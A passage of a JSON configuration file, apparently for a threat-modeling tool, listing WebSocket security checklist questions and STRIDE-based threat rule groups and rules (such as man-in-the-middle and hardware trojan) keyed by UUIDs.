attacks.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the secure wss:// protocol used over the unsecure ws:// protocol?","propertyID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0"},{"ID":"846dce78-6858-4d22-8564-6b384e07e53f","Name":"Security breach","Description":"It\u2019s relatively easy to tunnel arbitrary TCP services through a WebSocket. So you could, for example, tunnel a database connection directly through to the browser. This is very dangerous, however. Doing so would enable access to these services to an in-browser attacker in the case of a cross-site scripting attack, thus allowing an escalation of a XSS attack into a complete remote breach.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the connection tunneled to any other service (e.g. a database)?","propertyID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b"},{"ID":"03467a8a-5fc2-4d72-b496-592985cf5a77","Name":"Missing client data validation","Description":"WebSocket connections are easily established outside of a browser, so you should assume that you need to deal with arbitrary data. Just as with any data coming from a client, you should carefully validate input before processing it.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is client data validated before processing on the server?","propertyID":"8cd86481-a82f-490d-8d62-2195981779e9"},{"ID":"13a95615-356c-438e-be7e-b1d78c4fe46c","Name":"Missing server data validation","Description":"You should apply equal suspicion to data returned from the server. Always process messages received on the client side as data. Don\u2019t try to assign them directly to the DOM, nor evaluate as code. If the response is JSON, always use JSON.parse() to safely parse the data.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is server data validated and parsed before processing on the client?","propertyID":"92c3d3ef-aa2d-4920-978e-ff1755479308"},{"ID":"087222e9-70de-463c-8d00-b6e783f7def6","Name":"Missing authentication and authorization","Description":"The WebSocket protocol doesn\u2019t handle authorization or authentication. Practically, this means that a WebSocket opened from a page behind auth doesn\u2019t \u201cautomatically\u201d receive any sort of auth; you need to take steps to also secure the WebSocket connection.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is authentication and authorization handled separately (e.g. ticket-based)? ","propertyID":"485ff476-0c99-41de-b90a-4fdd27730685"},{"ID":"0fdc96b6-5786-4d72-bd28-3683fd6c4169","Name":"Denial of service attack","Description":"WebSockets let an unlimited number of connections reach the server. This lets an attacker flood the server with a DOS attack. This greatly strains the server and exhausts the resources on that server. Then the website slows down greatly.","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":true,"Value":"undefined"}},"OptionType":1,"componentTypeID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Question":"Is the number of connections limited?","propertyID":"9616fd88-1e3d-4d72-9178-ad81d793a744"}],"threatRuleGroups":[{"ID":"dc027a7a-9824-4b6a-befb-cc68270f2ecb","Name":"Stencil Rules","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["48cd5ba9-d234-442e-aebb-0011005f806d","cb3d7440-5d0f-482a-93cb-5ae9c625e31d","3459508a-9169-41ce-8e3a-6ea968023a3a","821594a6-02e5-4a15-9a72-9cca5b57ee92","7cfa63f6-262b-4da3-aa88-6478522b45c5","5c21d6b7-2390-4f72-b29e-7d7985a30293","13b5172b-9d6c-49a3-9580-fb256d5cd506","ddfef636-378c-4874-b2ea-33b0fcfe22c5","32dab43f-2dc8-4109-9420-ee7c118a82d5","4609cf84-96fa-4054-bf45-5b33993ce648","1d39d1b0-8f3c-40f7-bb6d-f7699b3b4b07","358f4f37-445a-4336-8107-c02d7b9cd3a4","2759171a-24e3-4bfe-8ca7-5814902a000e","4c58a730-0161-4385-8249-bbf603ae1b88","af1cd836-48c2-437c-93d0-58b7c9e1d0f6","09881484-9a79-427d-a638-3e894af45c13","5c467e46-e642-49ad-a057-4784ec792125","2af47360-11c3-45e3-a43f-fc3efa8f6f4d","53fc96a4-96a0-42cc-bb2a-fc4515b8b008","9846541d-9bf3-4a2e-98cb-1ad13da5648b","1da12d13-b7ea-4179-8c6b-b87a338d95a5","63fb20c8-4a32-430e-bfa4-587503eaf572","d0736981-7141-4d93-b493-d99135b8d236","2b24dfec-f29a-4682-8066-db29831234ec","e3a2c92b-834f-408e-a4d2-87cfc66bd9fc","834aa7e3-1a0b-47a8-abdc-b4b1a6705377","78a3949d-8677-4426-b2b1-eb20b4296821","12caa9f9-0b1c-4ce0-ac2b-ebee69001b1e","38d27f20-a7ee-40dc-aa6f-b10c98d72409","8597431f-52e2-4d89-bb21-7d34185dbfe6","b8438e31-cc77-4400-86c0-14aa01d411ae","fa055483-b3a2-461f-b09c-46e99de0455e","9ec88af2-3da9-41df-93bf-8cbcb74a7bb6","b41b621c-4b91-43f9-90ab-b7e955269620","08043f24-cc72-435b-ace1-bd593442215d","e8848ea8-e120-4722-bc10-90daf7b4a075","0e783801-b482-4721-af49-1be96b16fc59","512c6921-1b40-4e26-86b5-f66609e57d96","6a9008d4-fa27-46b1-8a11-6dbcecb8b211","e5f4b790-5898-495d-9b51-5a16d452edff","e2529607-c1fd-472d-ad14-c7f2cc719282","a3c2f053-c8d6-4626-ae54-79f87ae171c3","221071ed-1d87-43cc-8052-b615e6ebef04","240eabff-0c74-40e7-9748-d4cc46f59403","ad30b363-be03-41a8-a422-3ad63cb077b1","a727e065-ff95-47d5-8aac-625dfc7a453c","ee25afa7-0267-4f20-96bb-9912494a383e","12c29b20-0467-40ab-9208-2c01d6142eab","063b7019-22aa-4eb8-8e6f-9f81dbeb513b","df2c1c56-e04e-4b33-aae2-e13c9305a370","1cd3c1af-ff49-461f-9f55-fadb851a0893","a1ac559b-0ed9-4e5c-815d-80d6dc23308e","132c57c4-fe66-4c94-95e3-98a67669a4a5","c9be8d05-1ea5-4947-a786-33b505f2c5fd","56e4871b-bcb7-48f6-bd9e-5a8273d0b62c","d9290f90-aa79-432f-92e0-267226771aea","961c5b9f-ea27-48ec-b526-514636536540","b76247eb-309c-4fad-9a8c-28fea0a98555","b9b2fbaa-be5c-48ca-bddc-6d4cb5989f96","ba71d0ae-0a71-40d5-a3e3-f15c3a3baa2b","b05b7085-3952-4f0d-bb85-7c380eb32f92","8d604765-2981-4a70-9cb0-9569411503cc","2b0c94a0-f2c7-4068-86e4-2d5f7ed3fe94","2c32278f-ea97-4aa1-8e85-982f76dee1b9","a777fa41-a13f-4225-af47-e4458a0c8f9e","ab670c99-4f5c-41c7-974c-a6704df1661b","d406176c-9381-4f8c-aecc-b6d7ba56c7da","82c0d2ca-5756-40bd-a2e9-3c7ab8c5c2ba","bd2cf4bb-a728-46bd-8d38-269b4cfef7be","d07d24f4-10b5-452d-a489-10c9752dda4d","6394d7a4-c2db-4fe6-826c-93b1cd0d5373"]},{"ID":"b02f311c-0bb2-4057-9dde-6225ebbf4e1b","Name":"Component Rules","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8ab20d5d-f624-46f5-beeb-833327d8673f","34b65a9d-ca44-44b0-b66f-aa5bacfc53b4","67919611-8ec3-4d48-bbd7-03f963d6f12c","5585cf20-9e87-4ae5-960a-a952b07c37e5","b3a678a2-87a5-42ae-a1ef-4ec599554471","61452452-9fdc-4023-873d-93cd6d018abb","dde91006-ebc4-4e9c-906b-8c3591266097","a100a6c5-5f38-4224-a74a-825fa89579c2","96876c2e-a3e9-4e0f-afd0-fe721dd0f295","2b389d13-5f71-4bb4-b111-a7fee2b6a486","61e37274-9751-4250-8a4d-6476edc8f732","c54de80f-b548-4432-9ec0-fa3a579be7e6","c6535534-7656-4819-93fe-19d9a78a9390","85b3711a-33d2-4cd2-9c84-471e76cc761c","12c8413b-e1cc-40d6-ae07-6321c5fbf4a0","5aac31c8-fcb7-4d27-8937-e2c9747b83d4","6630ce3a-e21d-467a-b669-99418e95cd8a","6aec11cc-995c-4ee9-a1ce-506b071f3da3","2ee8ccf6-2886-4ebe-81d9-46a408b553a3","f46ae96c-b62c-4fda-955d-6ed55c157c7f","dfac545d-b449-45d0-95bd-a7814b1a97ce","4e5318de-8259-41cd-8704-8842a959b9c6","a904d935-a9d7-45d9-83c8-c403a57e0b80","8340469b-525d-4563-a75d-6ca1d60c7409","d714118d-123d-41b4-8997-63b13a5c09d4","90c71cb6-ec32-4eb6-95ca-20a5d7381fc6","cb711ade-c26b-4500-8337-4eba00d26975","1729c2ac-4dd2-449a-bd8a-ee7c11ff1461","b9caf305-7c53-48c9-beef-2fb2a96cc5b0","778eb19f-8f36-4ce5-aa48-70429386b113","c4df07d3-101f-492e-9f90-70d916f7ed43","b0d13562-1629-4724-bb67-f910157ed1c9","b4c216c0-ccab-4a4d-a156-1b4979dc2aec","c6ac1dcf-ff18-4810-ba64-10aaaf44c135","f51350c5-5401-4276-a8e5-14eba86bc070","e145ffad-ec47-4251-9fa4-1475133db2ff","cf4a11cf-4dee-46ef-8c68-48b5dced2de0","c46dc641-6f0f-4e80-9b80-3833f6c4f2c0","19f1cf08-5ab0-419c-9d56-b5d4d1fc6e24","370351b8-cef2-43bf-89f2-324a814e00a3","df78de64-d35e-474f-be3b-260f60a13fc6","ebf9833c-733d-4356-b390-e754096d0da8","543e017c-8bc2-444e-a3fb-d1dbd52ae21b","a68571c4-61b7-4a33-b5d9-104ef2c06ed0","4f2b98fa-8173-411d-a9b9-2cb0fb31fbde","96661040-05b5-436b-887a-f7864419d691","96208355-0119-41f4-9b93-b0a5781e9ae1","dfc187d5-8287-4c8e-99bc-09cc3e26e201","49344c1a-2368-4a01-a366-023707d0b354","b640f7fb-fb76-4de9-bcf2-0883807f58da","efd73610-90fd-406a-9139-82ff0552bc43","8886f368-618b-4520-a7f5-1db3141da66b","16f2c70d-1752-4e7a-b1ac-5f95710c2778","019f2476-ceca-47ab-b19e-9c2077cc35fe","11975f59-55e0-420f-9366-513175e9236e","1487298b-ff88-4e01-9a60-09b1eaf8a41f","10a258f6-49c0-435e-9a66-630039de0dc8","5d407978-73dc-45c9-8402-db692b42dae4","568a6a24-9109-4f93-b3b3-d3754260387e","5d59dab8-ca08-4359-8e7d-284dcde6d4b7","de96008b-1c59-4319-9b5c-4f5a7e97a122","337c4826-08ed-4c40-9542-54f08317ddb0","eac955da-c90f-4ca8-a1c1-bc186f7f0ad2","1267c02f-4adf-4086-9a9b-c5cc0f81c709","a529a0c3-a98e-41be-80f5-84b876ddddc6","b41315d4-f62d-4133-9a38-be8097a66ebb","50864039-1856-432a-9ff2-0acf3cccd644","d17d5929-ebcd-4c2c-95b6-f7c8ab4c5538","cffa8a3a-ec5b-4e2c-b118-80741e1c8e2a","8bab4292-bca9-4701-8141-a62fc2b2cded","ab8ff926-1147-4597-bded-42fbfb71edb2","135275c4-5523-4a95-a466-47947930377a","dbf5eca4-f98b-443d-b9a1-8113fafc962e","85519ed2-313e-4c85-85fd-f89109f845d4","871318c9-4e0c-4ff4-a475-06195ea4e3bb","bf9e6225-fb28-429a-84f1-fe3be63c3d95","ea2ba48d-b7f9-42c9-b9d9-f4a9816383b0","7f6ca653-a703-480c-b5d8-d82243171994","289c20cd-ea84-4375-8453-b045b94e1dc6","3a44327d-24d1-4c53-a3ea-7d891fb86f47","ea738f65-e0e7-4dc1-93b9-8798c4c8eeaf","6ffb7af3-466f-4cb7-965e-d60956b2ae7e","b2c6473b-9498-4b23-a02f-13e3818496d0","ca66721c-381d-43a1-9129-7643f04065d3","ff998b64-8348-4f41-8350-22ad07c68448","ab1d49fc-cb77-46cf-aeff-b4a28eb0d692","e014189e-5d3c-40c7-aac2-23202be3ccd4","a89ed38a-c36b-445b-a8c2-89e7289cdb9e","104ac1d9-34d6-4ce7-97f1-6d3dedcfbb59","2b82faea-2950-430d-8b52-273d9b0320e2","eaee9e9f-c3d7-42d7-9f8a-3d538cb9a17e","03778e71-e9a1-4528-b1db-547990486b27","359293f9-3fe1-4b61-99cb-332809add1f5","60b7ed0a-97b4-4904-a3bf-6d3ebdf01954","65c95996-5153-4f47-a7cd-0ffe05f96309","23c52b69-1923-416b-99a4-620d36961365","d0a3fe39-6894-44c5-91ec-1f1019ffda37","fdc27962-5622-47e7-8de8-ca1b60009276","d0bd34ae-02d2-46e9-b45a-0130be9713c4","662c14ed-b7cf-490a-97b8-978836d022bb","2d55c643-21db-426a-be29-d21f7f1965a4","3c1166bd-b978-4361-9846-33cd050dd968","42b3d570-e03c-440d-b7a4-87614c6b2e2c","d54bae32-33ff-4b3a-b583-07b53b4c947b","58d38f0f-82b4-4ecb-a95f-237adcfcb58c","cf9cef5a-3e4e-47cd-aa03-22522a1ce3e9","ae2e4063-13cd-414e-811d-3d114365f85f","db9dfe37-7599-4257-a425-e4948ffb8618","4c2aaafd-3248-4b30-b011-cddef8e75876","c68e523a-cba1-41b2-95ce-c8d634fd4396","a40575c4-b39f-4c9e-a4cb-3e15e3f27777","8825c214-9562-4a85-8538-a0530d2b79ee","ef631565-02d7-4f52-a80b-e615224409df","61c1d062-4c94-4af4-bd64-26a632462653","88d04fe9-ac62-4371-89d3-89471ac13027","ca3e9dda-cb0d-4f16-8b14-d0b11e4210cb","d5c0c703-75c1-42dd-a0d0-ca114eb7cdb4","9c362082-55b7-4c48-ac28-e381f5f38a2d","b634e0fe-6f3f-4c75-9df4-98f589d3a3f0","a05007e9-ca76-4584-a7be-47cf4a9625c4","f424f4d3-b3c2-4718-8c5f-ec9b3b6eef74","1a54b8f3-ecd6-4704-9f6c-e05b7e948548","105910c0-a5b5-4496-a2f7-99f11422e4b0","8f8d0183-5a29-451a-bb84-df061c0728d4","b274e8f6-5a0f-4efc-bc4e-40210c2035ad","ea3713af-49ae-4069-8353-78141725af6f","b8d4d723-fe3b-4288-87da-c73fc2412fc5","fa8d45ee-bfc7-47d7-9eed-4b38bc797336","db990108-a992-40e4-b2fc-d4dd00d42431","ac0e3170-0187-47e8-a2ed-6671cc24137e","7d0edcb5-7eff-490e-8d29-db68172ddd20","cc7e24ac-cfc0-4cf8-a291-386735862947","341eaf3e-808c-45de-9445-6be3cc66777b"]},{"ID":"1d995fc2-d7a5-4f46-ae16-954b8603b7fe","Name":"CPDFD Rules","Description":"","threatRuleGroupIDs":["cf6ecec7-3ece-4371-b6cc-976a435023ee","78cbfae0-bbd0-47a5-91ff-223518ffd7b1","4198e708-4e70-41f4-9466-dfc4cc171bfc","27b2bc15-e19c-452e-b096-4f910810e42f","e95a6d53-4e91-412b-ba0e-7a6e2dd5a52b","5d6a6968-e654-4080-91f2-a0755ae8f9e0","85f70a97-fb3a-498b-8402-bcc7f6737f73"],"threatRuleIDs":[]},{"ID":"cf6ecec7-3ece-4371-b6cc-976a435023ee","Name":"Basic Network Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8b527d06-5d08-41c1-91fc-1c4146858987","da0924b8-967c-406e-a2f5-a6ebac21de1d","b8e6349e-a52a-4f15-a349-312fc809fbb8","7b825bd7-222e-476f-bf22-85fe2e50eb6c","32d4322f-482d-4a59-8f62-964ef8014a0b","4440ba48-7d42-44cd-b5de-f6664ccc6259","1221dc8c-f495-4833-a027-c3c5d2dc1a7d","ef5ee1a2-c3b4-492d-b7be-d2285f10107c"]},{"ID":"5d6a6968-e654-4080-91f2-a0755ae8f9e0","Name":"STRIDE per Interaction (old)","Description":"According to Adam Shostack: Threat Modeling - Designing for Security","threatRuleGroupIDs":[],"threatRuleIDs":["29d9866c-8a0b-4443-ada2-116171c608f9","5bf95fe6-cca1-45f5-932a-454b16120983","950ae971-fb79-4df0-8df7-0ce1135ff194","6f361cd2-f478-4dad-a669-28ebcf80a5a2","2f6ebd9b-217d-4878-811f-069522e0161f","4f16fe8c-0967-4358-aa77-85d3bff2d8fa","7a18484f-4b3f-49ac-b95e-c963fea9d5d1","d1347b28-467e-4a98-b388-2e0ad6c7b99e","8f0df1ec-6bdc-4371-9f1e-230160e65fe4","a87f7506-1ff6-47db-8c8f-75153d3d8474","dedc4df7-5eab-4e98-aa28-5d16a99b98e7"]},{"ID":"4198e708-4e70-41f4-9466-dfc4cc171bfc","Name":"Implementation Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["b3450129-f094-4d50-bc87-efb4e8e84a12","4611ab6f-adbf-47f3-86ff-8af0ac645d80","3084a3b9-fdba-4bb1-97fa-c59ddbea7d22"]},{"ID":"27b2bc15-e19c-452e-b096-4f910810e42f","Name":"Physical Link Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["21c438f5-30d1-4cfc-9deb-78827b036a22","8aa3a3b1-0aff-4e15-ad59-cc40b75dbdbd","14a5667b-7aa9-41ef-82d1-c2a4e8e454aa","94f3da7c-2e51-4025-9521-d91bf790cdea","7892b860-7ed4-4109-ae03-3c290271fef6"]},{"ID":"78cbfae0-bbd0-47a5-91ff-223518ffd7b1","Name":"Advanced Network Attacks","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["8c29ed3b-b151-41de-81ae-627227aaa104"]},{"ID":"e95a6d53-4e91-412b-ba0e-7a6e2dd5a52b","Name":"STRIDE","Description":"","threatRuleGroupIDs":["12b0ec09-b6a6-48b9-8600-fc1816f3fe5f","8d69374e-a6be-40bc-a8b6-1365b3009c25","662f8645-0847-4a94-bd50-14b4615526cc","dd000a59-4eba-47ad-8fa5-4d2909ac5c44"],"threatRuleIDs":[]},{"ID":"12b0ec09-b6a6-48b9-8600-fc1816f3fe5f","Name":"Spoofing","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["6b4eb6d6-a03f-4678-a033-924bd5526f13","c6bc382b-d155-41c4-a41b-959d8a223e54","ab65566e-a317-4e67-b647-d79ac948a62b","87e896bb-eb2e-4481-801b-a11d31a4e5e3","38053480-8db1-4185-adcc-9ebb5b913bef"]},{"ID":"662f8645-0847-4a94-bd50-14b4615526cc","Name":"Repudiation","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["596fe057-9387-4f5c-bd01-ef81613739f4","3517184d-2795-45e8-8dde-667eb7aa8051","df93be9d-b184-4ee1-a1d0-4966c03721fc","8cc8d956-c72b-478c-88ba-e3dd362825a1","6e270c51-65fe-497d-baaa-e390617e27a6"]},{"ID":"dd000a59-4eba-47ad-8fa5-4d2909ac5c44","Name":"Denial of Service","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["b0d91b9a-111b-464b-8011-3e02defafe1d"]},{"ID":"8d69374e-a6be-40bc-a8b6-1365b3009c25","Name":"Tampering","Description":"","threatRuleGroupIDs":[],"threatRuleIDs":["fec7c871-d868-4edf-9bca-80c9061e830b"]},{"ID":"85f70a97-fb3a-498b-8402-bcc7f6737f73","Name":"STRIDE-per-Interaction","Description":"According to Adam Shostack: Threat Modeling - Designing for Security","threatRuleGroupIDs":[],"threatRuleIDs":["66f7a456-2edb-4d91-9bd1-aec421a92011","ddc5a2f1-7466-488d-a4f4-9f6a1520a00e","4d724289-8fe3-47c5-b44b-7fd9cac6c701","97682dbc-2fb9-456d-94c3-a6a09998b5a4","9e788439-62ed-44ea-9b19-093f92cf2223","30b01ab6-2eea-49ff-ac4e-f5838f8a8337","4f56c6cd-3daa-4b7a-91a5-740403957ff5","7b140721-9f7a-46a7-8290-931efec07769","557991c1-4eeb-40e1-96c3-c8a214278e29","8fabcdad-c70f-4416-8cb6-5c65a21142b0","f5894534-60a9-4363-84e5-4c0479ca71b9","71f98504-8182-4fb2-81ed-aea1e1953215","6d1d58a3-f4ff-4938-93d8-d91bb9ae3f58","6ca91e1b-746c-47bb-8cd3-2fa0c478042e","a1b5637c-fac3-4b49-bf3f-5f39ce8757da","c0158e50-7c0f-4457-a8ea-223ff165fdaf","984d970a-8ef5-445c-a15b-7613b313306c","a7f340d4-3aa2-45d2-9226-db55414c7f69","2a2ea224-58c9-4187-b721-940fc97b1c04","c1e53b74-7e9d-4566-b690-978bfc8b9af3","35915020-1d0c-4853-849d-d32159bf6401","1308104d-16da-432f-a70f-8de14a8bfbf9","3008afca-320c-489b-9ff6-f61b7cdf497c","46a79465-8cb7-4c8e-8025-e1a08e9620d8","134a6570-e75e-4c8a-bd2f-f02b5a052878","4c4d3f55-3ffd-4416-9bc3-4bf2921110e1","0115bdb1-d2ab-4bbc-bfd1-b23c831b5a70","b06930a0-bff1-49e4-889c-6211290de683","2a171a21-0d62-4159-b7ab-5e2ad1796fff","7e4e6144-6504-4796-a3ca-00962c0a9cbb","d59a4a10-780a-465b-86fa-292a07e7a89a","d675c061-7af1-4e49-a503-0b512a85f9da","427f13f4-ce93-4344-b6fc-1178ea54199e"]}],"threatRules":[{"ID":"48cd5ba9-d234-442e-aebb-0011005f806d","Name":"Hardware trojan","Description":"ToDo","IsActive":true,"Mapping":{"AttackVectorID":"b703d3d9-1f29-480a-b7ad-b11716727a91","ThreatCategoryIDs":["ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"]},"RuleType":1,"StencilRestriction":{"stencilTypeID":"6065e8dd-23c0-4dc9-ad51-628af88f3309","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"IsCustomDesign","ComparisonType":"==","Value":true}}]},"RuleGenerationType":2,"overridenRuleIDs":[],"Severity":3},{"ID":"b8e6349e-a52a-4f15-a349-312fc809fbb8","Name":"MitM attack","Description":"","IsActive":true,"Mapping":{"AttackVectorID":"e58fcbde-e429-4704-9f22-c00d187994bc","ThreatCategoryIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2","c7598413-4382-43e9-9904-fd9d877eb7a9","02b39924-b8f2-44da-a2bc-be1bd2450f68","04be7cf6-00dd-4aa8-b90b-e9bf105e39e7"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":true}},{"Layer":1,"NodeNumber":-1,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}},{"Layer":1,"NodeNumber":-1,"IsOR":true,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}},{"Layer":1,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}],"Target":-1,"AppliesReverse":true},"RuleGenerationType":1,"overridenRuleIDs":[],"Severity":4},{"ID":"29d9866c-8a0b-4443-ada2-116171c608f9","Name":"Process -> Data Store","Description":"Process has outbound data flow to data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"5bf95fe6-cca1-45f5-932a-454b16120983","Name":"Process -> Process","Description":"Process sends output to another process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"950ae971-fb79-4df0-8df7-0ce1135ff194","Name":"Process -> Ext. Entity","Description":"Process sends output to external entity (code).","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"6f361cd2-f478-4dad-a669-28ebcf80a5a2","Name":"Process -> Phy. Ext. Entity","Description":"Process sends output to external entity (human).","IsActive":false,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"2f6ebd9b-217d-4878-811f-069522e0161f","Name":"Process <- Data Store","Description":"Process has inbound data flow from a data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","f0e814f3-b3d2-4357-b155-8fffd70ec42e","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"4f16fe8c-0967-4358-aa77-85d3bff2d8fa","Name":"Process <- Process","Description":"Process has inbound data flow from a process.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","a77f314c-f74e-4340-a993-5a1a24f26db4","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"7a18484f-4b3f-49ac-b95e-c963fea9d5d1","Name":"Process <- Ext. Entity","Description":"Process has inbound data flow from a external entity.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4","422b9042-212d-4467-a000-2528a2e09f8b","8687e614-c127-418b-8fda-536bb2f0708f"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"d1347b28-467e-4a98-b388-2e0ad6c7b99e","Name":"Data Store <- Process","Description":"Process has outbound data flow to data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e","a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[],"Target":1},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"8f0df1ec-6bdc-4371-9f1e-230160e65fe4","Name":"Data Store -> Process","Description":"Process has inbound data flow from data store.","IsActive":false,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4","369640cc-1b53-4a2e-9e3b-a74c187e68e7","422b9042-212d-4467-a000-2528a2e09f8b"]},"RuleType":2,"DFDRestriction":{"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[],"Target":0},"RuleGenerationType":1,"overridenRuleIDs":[]},{"ID":"a87f7506-1ff6-47db-8c8f-75153d3d8474","Name":"Ext. Entity -> Process","Description":"External interactor passes input to 